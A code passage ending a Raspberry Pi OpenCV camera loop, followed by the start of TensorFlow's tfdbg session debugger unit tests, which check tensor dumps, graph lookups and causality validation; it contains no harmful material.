#cv2.imshow("firstFrame", firstFrame)
cv2.imshow("Feed", frame)
i = 0
rawCapture.truncate(0)
upDateFrame=+1
key = cv2.waitKey(1) & 0xFF
if key == ord("q"):
break
if key == ord("n"):
firstFrame = None
# Release and destroy
GPIO.cleanup()
camera.release()
cv2.destroyAllWindows()
|
session_debug_testlib.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for debugger functionalities in tf.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import glob
import os
import shutil
import tempfile
import threading
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.core.util import event_pb2
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.lib import debug_graphs
from tensorflow.python.debug.lib import debug_utils
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import parsing_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
import tensorflow.python.ops.tensor_array_grad # pylint: disable=unused-import
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
def no_rewrite_session_config():
rewriter_config = rewriter_config_pb2.RewriterConfig(
disable_model_pruning=True,
arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF,
dependency_optimization=rewriter_config_pb2.RewriterConfig.OFF)
graph_options = config_pb2.GraphOptions(rewrite_options=rewriter_config)
return config_pb2.ConfigProto(graph_options=graph_options)
class _RNNCellForTest(rnn_cell_impl.RNNCell):
"""RNN cell for testing."""
def __init__(self, input_output_size, state_size):
self._input_output_size = input_output_size
self._state_size = state_size
self._w = variables.Variable(1.0, dtype=dtypes.float32, name="w")
@property
def output_size(self):
return self._input_output_size
@property
def state_size(self):
return self._state_size
def __call__(self, input_, state, scope=None):
return (math_ops.multiply(self._w, input_), state)
class SessionDebugTestBase(test_util.TensorFlowTestCase):
"""Base class for unit tests of tfdbg running with tf.Session."""
@classmethod
def setUpClass(cls):
if test.is_gpu_available():
cls._expected_partition_graph_count = 2
cls._expected_num_devices = 2
gpu_name = test_util.gpu_device_name()
cls._main_device = "/job:localhost/replica:0/task:0" + gpu_name
else:
cls._expected_partition_graph_count = 1
cls._expected_num_devices = 1
cls._main_device = "/job:localhost/replica:0/task:0/device:CPU:0"
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
self._dump_root = tempfile.mkdtemp()
def tearDown(self):
ops.reset_default_graph()
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
def _debug_urls(self, run_number=None):
raise NotImplementedError(
"_debug_urls() method is not implemented in the base test class.")
def _debug_dump_dir(self, run_number=None):
raise NotImplementedError(
"_debug_dump_dir() method is not implemented in the base test class.")
def _debug_run_and_get_dump(self,
sess,
fetches,
feed_dict=None,
debug_ops="DebugIdentity",
tolerate_debug_op_creation_failures=False,
global_step=-1,
validate=True,
expected_partition_graph_count=None):
"""Run fetches with debugging and obtain DebugDumpDir.
Args:
sess: the tf.Session to be used.
fetches: fetches of the Session.run().
feed_dict: feed dict for the Session.run().
debug_ops: name(s) of the debug ops to be used.
tolerate_debug_op_creation_failures: whether to tolerate debug op
creation failures.
global_step: Optional global step.
validate: whether to validate dumped tensors against graph.
expected_partition_graph_count: optional count of partition graphs to
assert on.
Returns:
1. Return values of the Session.run().
2. The DebugDumpDir object from the debugged run().
"""
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=debug_ops,
debug_urls=self._debug_urls(),
tolerate_debug_op_creation_failures=tolerate_debug_op_creation_failures,
global_step=global_step)
run_metadata = config_pb2.RunMetadata()
run_output = sess.run(fetches,
feed_dict=feed_dict,
options=run_options,
run_metadata=run_metadata)
if expected_partition_graph_count is not None:
self.assertEqual(expected_partition_graph_count,
len(run_metadata.partition_graphs))
return run_output, debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs,
validate=validate)
def _generate_dump_from_simple_addition_graph(self):
with session.Session(config=no_rewrite_session_config()) as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
v_init_val = np.array([[2.0], [-1.0]])
# Use node names with overlapping namespace (i.e., parent directory) to
# test concurrent, non-racing directory creation.
u_name = "u"
v_name = "v"
w_name = "w"
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant(v_init_val, shape=[2, 1])
v = variables.Variable(v_init, name=v_name)
w = math_ops.matmul(u, v, name=w_name)
u.initializer.run()
v.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = "file://%s" % self._dump_root
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Invoke Session.run().
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
simple_add_results = collections.namedtuple("SimpleAddResults", [
"u_init_val", "v_init_val", "u", "v", "w", "u_name", "v_name", "w_name",
"dump"
])
return simple_add_results(u_init_val, v_init_val, u, v, w, u_name, v_name,
w_name, dump)
def testCopyNodesHaveCorrectDebugOpsAndURLsAttributeValues(self):
with session.Session() as sess:
u = variables.Variable(2.1, name="u")
v = variables.Variable(20.0, name="v")
w = math_ops.multiply(u, v, name="w")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
debug_utils.add_debug_tensor_watch(
run_options,
"u",
0, ["DebugNumericSummary(gated_grpc=True)", "DebugIdentity"],
debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, "v", 0, ["DebugNumericSummary"], debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertAllClose(42.0, r)
u_copy_node_def = None
v_copy_node_def = None
for partition_graph in run_metadata.partition_graphs:
for node_def in partition_graph.node:
if debug_graphs.is_copy_node(node_def.name):
if node_def.name == "__copy_u_0":
u_copy_node_def = node_def
elif node_def.name == "__copy_v_0":
v_copy_node_def = node_def
self.assertIsNotNone(u_copy_node_def)
debug_ops_spec = u_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(2, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;1" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
self.assertEqual("DebugIdentity;%s;0" % debug_urls[0],
debug_ops_spec[1].decode("utf-8"))
self.assertIsNotNone(v_copy_node_def)
debug_ops_spec = v_copy_node_def.attr["debug_ops_spec"].list.s
self.assertEqual(1, len(debug_ops_spec))
self.assertEqual("DebugNumericSummary;%s;0" % debug_urls[0],
debug_ops_spec[0].decode("utf-8"))
def testConcurrentDumpingToPathsWithOverlappingParentDirsWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertTrue(results.dump.loaded_partition_graphs())
# Since global_step is not explicitly specified, it should take its default
# value: -1.
self.assertEqual(-1, results.dump.core_metadata.global_step)
self.assertGreaterEqual(results.dump.core_metadata.session_run_index, 0)
self.assertGreaterEqual(results.dump.core_metadata.executor_step_index, 0)
self.assertEqual([], results.dump.core_metadata.input_names)
self.assertEqual([results.w.name], results.dump.core_metadata.output_names)
self.assertEqual([], results.dump.core_metadata.target_nodes)
# Verify the dumped tensor values for u and v.
self.assertEqual(2, results.dump.size)
self.assertAllClose([results.u_init_val],
results.dump.get_tensors("%s/read" % results.u_name, 0,
"DebugIdentity"))
self.assertAllClose([results.v_init_val],
results.dump.get_tensors("%s/read" % results.v_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreaterEqual(
results.dump.get_rel_timestamps("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.u_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
results.dump.get_dump_sizes_bytes("%s/read" % results.v_name, 0,
"DebugIdentity")[0], 0)
def testGetOpTypeWorks(self):
results = self._generate_dump_from_simple_addition_graph()
self.assertEqual(results.u.op.type,
results.dump.node_op_type(results.u_name))
self.assertIn(results.v.op.type, results.dump.node_op_type(results.v_name))
self.assertIn(results.w.op.type, results.dump.node_op_type(results.w_name))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
results.dump.node_op_type("foo_bar")
def testDumpStringTensorsWorks(self):
with session.Session(config=no_rewrite_session_config()) as sess:
str1_init_val = np.array(b"abc")
str2_init_val = np.array(b"def")
str1_init = constant_op.constant(str1_init_val)
str2_init = constant_op.constant(str2_init_val)
str1_name = "str1"
str2_name = "str2"
str1 = variables.Variable(str1_init, name=str1_name)
str2 = variables.Variable(str2_init, name=str2_name)
# Concatenate str1 and str2
str_concat = math_ops.add(str1, str2, name="str_concat")
str1.initializer.run()
str2.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str1_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % str2_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
sess.run(str_concat, options=run_options, run_metadata=run_metadata)
# String ops are located on CPU.
self.assertEqual(1, len(run_metadata.partition_graphs))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertIn(str1_name, dump.nodes())
self.assertIn(str2_name, dump.nodes())
self.assertEqual(2, dump.size)
self.assertEqual([str1_init_val],
dump.get_tensors("%s/read" % str1_name, 0,
"DebugIdentity"))
self.assertEqual([str2_init_val],
dump.get_tensors("%s/read" % str2_name, 0,
"DebugIdentity"))
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str1_name, 0, "DebugIdentity")[0],
0)
self.assertGreaterEqual(
dump.get_rel_timestamps("%s/read" % str2_name, 0, "DebugIdentity")[0],
0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str1_name, 0,
"DebugIdentity")[0], 0)
self.assertGreater(
dump.get_dump_sizes_bytes("%s/read" % str2_name, 0,
"DebugIdentity")[0], 0)
def testDumpUninitializedVariable(self):
op_namespace = "testDumpUninitializedVariable"
with session.Session() as sess:
u_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
s_init_val = b"str1"
u_name = "%s/u" % op_namespace
s_name = "%s/s" % op_namespace
u_init = constant_op.constant(u_init_val, shape=[2, 2])
u = variables.Variable(u_init, name=u_name)
s_init = constant_op.constant(s_init_val)
s = variables.Variable(s_init, name=s_name)
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=debug_urls)
debug_utils.add_debug_tensor_watch(
run_options, s_name, 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
# Initialize u and s.
sess.run(variables.global_variables_initializer(),
options=run_options,
run_metadata=run_metadata)
# Verify the dump file for the uninitialized value of u.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
self.assertEqual(2, dump.size)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# Verify that the variable is properly initialized by the run() call.
u_vals = dump.get_tensors(u_name, 0, "DebugIdentity")
s_vals = dump.get_tensors(s_name, 0, "DebugIdentity")
self.assertEqual(1, len(u_vals))
self.assertIsInstance(u_vals[0], debug_data.InconvertibleTensorProto)
self.assertFalse(u_vals[0].initialized)
self.assertEqual(1, len(s_vals))
self.assertIsInstance(s_vals[0], debug_data.InconvertibleTensorProto)
self.assertFalse(s_vals[0].initialized)
# Call run() again, to check that u is initialized properly.
self.assertAllClose(u_init_val, sess.run(u))
self.assertEqual(s_init_val, sess.run(s))
def testDebugWhileLoopGeneratesMultipleDumps(self):
with session.Session(config=no_rewrite_session_config()) as sess:
num_iter = 10
# "u" is the Variable being updated in the loop.
u_name = "testDumpToFileWhileLoop/u"
u_namespace = u_name.split("/")[0]
u_init_val = np.array(11.0)
u_init = constant_op.constant(u_init_val)
u = variables.Variable(u_init, name=u_name)
# "v" is the increment.
v_name = "testDumpToFileWhileLoop/v"
v_namespace = v_name.split("/")[0]
v_init_val = np.array(2.0)
v_init = constant_op.constant(v_init_val)
v = variables.Variable(v_init, name=v_name)
u.initializer.run()
v.initializer.run()
i = constant_op.constant(0, name="testDumpToFileWhileLoop/i")
def cond(i):
return math_ops.less(i, num_iter)
def body(i):
new_u = state_ops.assign_add(u, v)
new_i = math_ops.add(i, 1)
op = control_flow_ops.group(new_u)
new_i = control_flow_ops.with_dependencies([op], new_i)
return [new_i]
loop = control_flow_ops.while_loop(
cond, body, [i], parallel_iterations=10)
# Create RunOptions for debug-watching tensors
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_urls = self._debug_urls()
# Add debug tensor watch for u.
debug_utils.add_debug_tensor_watch(
run_options, u_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for v.
debug_utils.add_debug_tensor_watch(
run_options, "%s/read" % v_name, 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Identity.
debug_utils.add_debug_tensor_watch(
run_options, "while/Identity", 0, debug_urls=debug_urls)
# Add debug tensor watch for while/Add/y.
debug_utils.add_debug_tensor_watch(
run_options, "while/Add/y", 0, debug_urls=debug_urls)
run_metadata = config_pb2.RunMetadata()
r = sess.run(loop, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
self.assertEqual(num_iter, r)
u_val_final = sess.run(u)
self.assertAllClose(u_init_val + num_iter * v_init_val, u_val_final)
# Verify dump files
self.assertTrue(os.path.isdir(self._dump_root))
u_glob_out = glob.glob(os.path.join(self._dump_root, "*", u_namespace))
v_glob_out = glob.glob(os.path.join(
self._dump_root, "*", v_namespace, "v"))
self.assertTrue(os.path.isdir(u_glob_out[0]))
self.assertTrue(os.path.isdir(v_glob_out[0]))
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Expected dumped tensors: u, v/read, 10 iterations of while/Identity,
# and 10 iterations of while/Add/y.
self.assertEqual(1 + 1 + num_iter + num_iter, dump.size)
# Verify tensor values.
self.assertAllClose([u_init_val],
dump.get_tensors(u_name, 0, "DebugIdentity"))
self.assertAllClose([v_init_val],
dump.get_tensors("%s/read" % v_name, 0,
"DebugIdentity"))
while_id_tensors = dump.get_tensors("while/Identity", 0, "DebugIdentity")
self.assertEqual(10, len(while_id_tensors))
for k in xrange(len(while_id_tensors)):
self.assertAllClose(np.array(k), while_id_tensors[k])
# Verify ascending timestamps from the while loops.
while_id_rel_timestamps = dump.get_rel_timestamps("while/Identity", 0,
"DebugIdentity")
while_id_dump_sizes_bytes = dump.get_dump_sizes_bytes("while/Identity", 0,
"DebugIdentity")
self.assertEqual(10, len(while_id_rel_timestamps))
prev_rel_time = 0
prev_dump_size_bytes = while_id_dump_sizes_bytes[0]
for rel_time, dump_size_bytes in zip(while_id_rel_timestamps,
while_id_dump_sizes_bytes):
self.assertGreaterEqual(rel_time, prev_rel_time)
self.assertEqual(dump_size_bytes, prev_dump_size_bytes)
prev_rel_time = rel_time
prev_dump_size_bytes = dump_size_bytes
# Test querying debug watch keys from node name.
watch_keys = dump.debug_watch_keys("while/Identity")
self.assertEqual(["while/Identity:0:DebugIdentity"], watch_keys)
# Test querying debug datum instances from debug watch key.
self.assertEqual(10, len(dump.watch_key_to_data(watch_keys[0])))
self.assertEqual([], dump.watch_key_to_data("foo"))
def testDebugWhileLoopWatchingWholeGraphWorks(self):
with session.Session() as sess:
loop_body = lambda i: math_ops.add(i, 2)
loop_cond = lambda i: math_ops.less(i, 16)
i = constant_op.constant(10, name="i")
loop = control_flow_ops.while_loop(loop_cond, loop_body, [i])
loop_result, dump = self._debug_run_and_get_dump(sess, loop)
self.assertEqual(16, loop_result)
self.assertEqual(
[[10]], dump.get_tensors("while/Enter", 0, "DebugIdentity"))
self.assertEqual(
[[12], [14], [16]],
dump.get_tensors("while/NextIteration", 0, "DebugIdentity"))
def testDebugTrainingDynamicRNNWorks(self):
with session.Session() as sess:
input_size = 3
state_size = 2
time_steps = 4
batch_size = 2
input_values = np.random.randn(time_steps, batch_size, input_size)
sequence_length = np.random.randint(0, time_steps, size=batch_size)
concat_inputs = array_ops.placeholder(
dtypes.float32, shape=(time_steps, batch_size, input_size))
outputs_dynamic, _ = rnn.dynamic_rnn(
_RNNCellForTest(input_size, state_size),
inputs=concat_inputs,
sequence_length=sequence_length,
time_major=True,
dtype=dtypes.float32)
toy_loss = math_ops.reduce_sum(outputs_dynamic * outputs_dynamic)
train_op = gradient_descent.GradientDescentOptimizer(
learning_rate=0.1).minimize(toy_loss, name="train_op")
sess.run(variables.global_variables_initializer())
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph_with_blacklists(
run_options,
sess.graph,
node_name_regex_blacklist="(.*rnn/while/.*|.*TensorArray.*)",
debug_urls=self._debug_urls())
# b/36870549: Nodes with these name patterns need to be excluded from
# tfdbg in order to prevent MSAN warnings of uninitialized Tensors
# under both file:// and grpc:// debug URL schemes.
run_metadata = config_pb2.RunMetadata()
sess.run(train_op, feed_dict={concat_inputs: input_values},
options=run_options, run_metadata=run_metadata)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testDebugCondWatchingWholeGraphWorks(self):
with session.Session() as sess:
x = variables.Variable(10.0, name="x")
y = variables.Variable(20.0, name="y")
cond = control_flow_ops.cond(
x > y, lambda: math_ops.add(x, 1), lambda: math_ops.add(y, 1))
sess.run(variables.global_variables_initializer())
cond_result, dump = self._debug_run_and_get_dump(sess, cond)
self.assertEqual(21, cond_result)
self.assertAllClose(
[21.0], dump.get_tensors("cond/Merge", 0, "DebugIdentity"))
def testFindNodesWithBadTensorValues(self):
with session.Session() as sess:
u_name = "testFindNodesWithBadTensorValues/u"
v_name = "testFindNodesWithBadTensorValues/v"
w_name = "testFindNodesWithBadTensorValues/w"
x_name = "testFindNodesWithBadTensorValues/x"
y_name = "testFindNodesWithBadTensorValues/y"
z_name = "testFindNodesWithBadTensorValues/z"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v_init = constant_op.constant([2.0, 1.0])
v = variables.Variable(v_init, name=v_name)
# Expected output: [0.0, 3.0]
w = math_ops.subtract(u, v, name=w_name)
# Expected output: [inf, 1.3333]
x = math_ops.div(u, w, name=x_name)
# Expected output: [nan, 4.0]
y = math_ops.multiply(w, x, name=y_name)
z = math_ops.multiply(y, y, name=z_name)
u.initializer.run()
v.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, z,
expected_partition_graph_count=self._expected_partition_graph_count)
def has_bad_value(_, tensor):
return np.any(np.isnan(tensor)) or np.any(np.isinf(tensor))
# Find all "offending tensors".
bad_data = dump.find(has_bad_value)
# Verify that the nodes with bad values are caught through running find
# on the debug dump.
self.assertEqual(3, len(bad_data))
self.assertEqual(x_name, bad_data[0].node_name)
self.assertEqual(y_name, bad_data[1].node_name)
self.assertEqual(z_name, bad_data[2].node_name)
# Test first_n kwarg of find(): Find the first offending tensor.
first_bad_datum = dump.find(has_bad_value, first_n=1)
self.assertEqual(1, len(first_bad_datum))
self.assertEqual(x_name, first_bad_datum[0].node_name)
def _session_run_for_graph_structure_lookup(self):
with session.Session(config=no_rewrite_session_config()) as sess:
u_name = "testDumpGraphStructureLookup/u"
v_name = "testDumpGraphStructureLookup/v"
w_name = "testDumpGraphStructureLookup/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
_, dump = self._debug_run_and_get_dump(
sess, w,
expected_partition_graph_count=self._expected_partition_graph_count)
return u_name, v_name, w_name, dump
def testGraphStructureLookupGivesDevicesAndNodesInfo(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
# Test num_devices().
self.assertEqual(self._expected_num_devices, len(dump.devices()))
# Test node_device().
self.assertEqual(self._main_device, dump.node_device(u_name))
with self.assertRaisesRegexp(ValueError,
"does not exist in partition graphs"):
dump.node_device(u_name + "foo")
# Test node_exists().
self.assertTrue(dump.node_exists(u_name))
self.assertTrue(dump.node_exists(u_name + "/read"))
self.assertFalse(dump.node_exists(u_name + "/read" + "/foo"))
def testGraphStructureLookupGivesNodesAndAttributes(self):
u_name, _, _, dump = self._session_run_for_graph_structure_lookup()
u_read_name = u_name + "/read"
# Test node name list lookup of the DebugDumpDir object.
if test_util.gpu_device_name():
node_names = dump.nodes(
device_name="/job:localhost/replica:0/task:0/device:GPU:0")
else:
node_names = dump.nodes()
self.assertTrue(u_name in node_names)
self.assertTrue(u_read_name in node_names)
# Test querying node attributes.
u_attr = dump.node_attributes(u_name)
self.assertEqual(dtypes.float32, u_attr["dtype"].type)
self.assertEqual(1, len(u_attr["shape"].shape.dim))
self.assertEqual(2, u_attr["shape"].shape.dim[0].size)
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_attributes("foo")
def testGraphStructureLookupGivesDebugWatchKeys(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
# Test querying the debug watch keys with node names.
self.assertEqual(["%s:0:DebugIdentity" % u_name],
dump.debug_watch_keys(u_name))
self.assertEqual(["%s:0:DebugIdentity" % v_name],
dump.debug_watch_keys(v_name))
self.assertEqual(["%s:0:DebugIdentity" % w_name],
dump.debug_watch_keys(w_name))
self.assertEqual([], dump.debug_watch_keys("foo"))
# Test querying debug datum instances from debug watch.
u_data = dump.watch_key_to_data(dump.debug_watch_keys(u_name)[0])
self.assertEqual(1, len(u_data))
self.assertEqual(u_name, u_data[0].node_name)
self.assertEqual(0, u_data[0].output_slot)
self.assertEqual("DebugIdentity", u_data[0].debug_op)
self.assertGreaterEqual(u_data[0].timestamp, 0)
self.assertEqual([], dump.watch_key_to_data("foo"))
def testGraphStructureLookupGivesNodeInputsAndRecipients(self):
u_name, v_name, w_name, dump = (
self._session_run_for_graph_structure_lookup())
u_read_name = u_name + "/read"
# Test the inputs lookup of the DebugDumpDir object.
self.assertEqual([], dump.node_inputs(u_name))
self.assertEqual([u_name], dump.node_inputs(u_read_name))
self.assertEqual([u_read_name] * 2, dump.node_inputs(v_name))
self.assertEqual([v_name] * 2, dump.node_inputs(w_name))
self.assertEqual([], dump.node_inputs(u_name, is_control=True))
self.assertEqual([], dump.node_inputs(u_read_name, is_control=True))
self.assertEqual([], dump.node_inputs(v_name, is_control=True))
self.assertEqual([], dump.node_inputs(w_name, is_control=True))
# Test the outputs recipient lookup of the DebugDumpDir object.
self.assertTrue(u_read_name in dump.node_recipients(u_name))
self.assertEqual(2, dump.node_recipients(u_read_name).count(v_name))
self.assertEqual(2, dump.node_recipients(v_name).count(w_name))
self.assertEqual([], dump.node_recipients(u_name, is_control=True))
self.assertEqual([], dump.node_recipients(u_read_name, is_control=True))
self.assertEqual([], dump.node_recipients(v_name, is_control=True))
self.assertEqual([], dump.node_recipients(w_name, is_control=True))
# Test errors raised on invalid node names.
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_inputs(u_name + "foo")
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.node_recipients(u_name + "foo")
# Test transitive_inputs().
self.assertEqual([], dump.transitive_inputs(u_name))
self.assertEqual([u_name], dump.transitive_inputs(u_read_name))
self.assertEqual(
set([u_name, u_read_name]), set(dump.transitive_inputs(v_name)))
self.assertEqual(
set([u_name, u_read_name, v_name]), set(dump.transitive_inputs(w_name)))
with self.assertRaisesRegexp(
ValueError, r"None of the .* device\(s\) has a node named "):
dump.transitive_inputs(u_name + "foo")
def testGraphStructureLookupWithoutPartitionGraphsDoesNotErrorOut(self):
_, _, _, dump = self._session_run_for_graph_structure_lookup()
# Now load the dump again, without the partition graphs, so we can check
# errors are not raised because the partition graphs are loaded from the
# dump directory.
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertTrue(dump.loaded_partition_graphs())
def testGraphPathFindingOnControlEdgesWorks(self):
with session.Session(config=no_rewrite_session_config()) as sess:
v1 = variables.Variable(1.0, name="v1")
v2 = variables.Variable(2.0, name="v2")
v3 = variables.Variable(3.0, name="v3")
a = math_ops.add(v1, v2, name="a")
with ops.control_dependencies([a]):
c = math_ops.subtract(v3, v3, name="c")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, c)
self.assertEqual(["v1", "v1/read", "a", "c"],
dump.find_some_path("v1", "c"))
self.assertIsNone(dump.find_some_path("v1", "c", include_control=False))
def testGraphPathFindingReverseRefEdgeWorks(self):
with session.Session(config=no_rewrite_session_config()) as sess:
v = variables.Variable(10.0, name="v")
delta = variables.Variable(1.0, name="delta")
inc_v = state_ops.assign_add(v, delta, name="inc_v")
sess.run(variables.global_variables_initializer())
_, dump = self._debug_run_and_get_dump(sess, inc_v)
self.assertEqual(
["delta", "delta/read", "inc_v", "v"],
dump.find_some_path("delta", "v", include_reversed_ref=True))
self.assertIsNone(dump.find_some_path("delta", "v"))
def testCausalityCheckOnDumpsDetectsWrongTemporalOrder(self):
with session.Session(config=no_rewrite_session_config()) as sess:
u_name = "testDumpCausalityCheck/u"
v_name = "testDumpCausalityCheck/v"
w_name = "testDumpCausalityCheck/w"
u_init = constant_op.constant([2.0, 4.0])
u = variables.Variable(u_init, name=u_name)
v = math_ops.add(u, u, name=v_name)
w = math_ops.add(v, v, name=w_name)
u.initializer.run()
run_options = config_pb2.RunOptions(output_partition_graphs=True)
debug_utils.watch_graph(
run_options,
sess.graph,
debug_ops=["DebugIdentity"],
debug_urls=self._debug_urls())
run_metadata = config_pb2.RunMetadata()
sess.run(w, options=run_options, run_metadata=run_metadata)
self.assertEqual(self._expected_partition_graph_count,
len(run_metadata.partition_graphs))
# First, loading the original dump without supplying the
# partition_graphs should not cause a LookupError, validation occurs
# only with partition_graphs loaded.
debug_data.DebugDumpDir(self._dump_root)
# Now, loading the original dump with partition graphs supplied should
# succeed. The validation should pass quietly.
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Get the dump file names and compute their timestamps.
self.assertEqual(
1, len(dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")))
v_file_path = dump.get_tensor_file_paths(v_name, 0, "DebugIdentity")[0]
self.assertEqual(
1, len(dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")))
w_file_path = dump.get_tensor_file_paths(w_name, 0, "DebugIdentity")[0]
v_timestamp = int(v_file_path[v_file_path.rindex("_") + 1:])
w_timestamp = int(w_file_path[w_file_path.rindex("_") + 1:])
# Swap and slightly shift the time stamps of the last two dumped tensors,
# to simulate "causality violation", which can happen if the dump
# directory contains incomplete data and/or mixes data from different
# Session.run() calls.
v_file_path_1 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_1 = w_file_path[:w_file_path.rindex("_")] + "_%d" % (
v_timestamp - 1)
os.rename(v_file_path, v_file_path_1)
os.rename(w_file_path, w_file_path_1)
# Load the dump directory again. Now a ValueError is expected to be
# raised due to the timestamp swap.
with self.assertRaisesRegexp(ValueError, "Causality violated"):
dump = debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
# Loading the dump directory with kwarg "validate" set explicitly to
# False should get rid of the error.
dump = debug_data.DebugDumpDir(
self._dump_root,
partition_graphs=run_metadata.partition_graphs,
validate=False)
# Next, set the two times stamps to be the same, which should be fine.
v_file_path_2 = v_file_path[:v_file_path.rindex(
"_")] + "_%d" % w_timestamp
w_file_path_2 = w_file_path[:w_file_path.rindex(
"_")] + "_%d" % w_timestamp
os.rename(v_file_path_1, v_file_path_2)
os.rename(w_file_path_1, w_file_path_2)
debug_data.DebugDumpDir(
self._dump_root, partition_graphs=run_metadata.partition_graphs)
def testWatchingOnlyOneOfTwoOutputSlotsDoesNotLeadToCausalityFailure(self):
with session.Session() as sess:
x_name = "oneOfTwoSlots/x"
u_name = "oneOfTwoSlots/u"
v_name = "oneOfTwoSlots/v"
w_name = "oneOfTwoSlots/w"
y_name = "oneOfTwoSlots/y"
x = variables.Variable([1, 3, 3, 7], dtype=dtypes.int32, name=x_name)
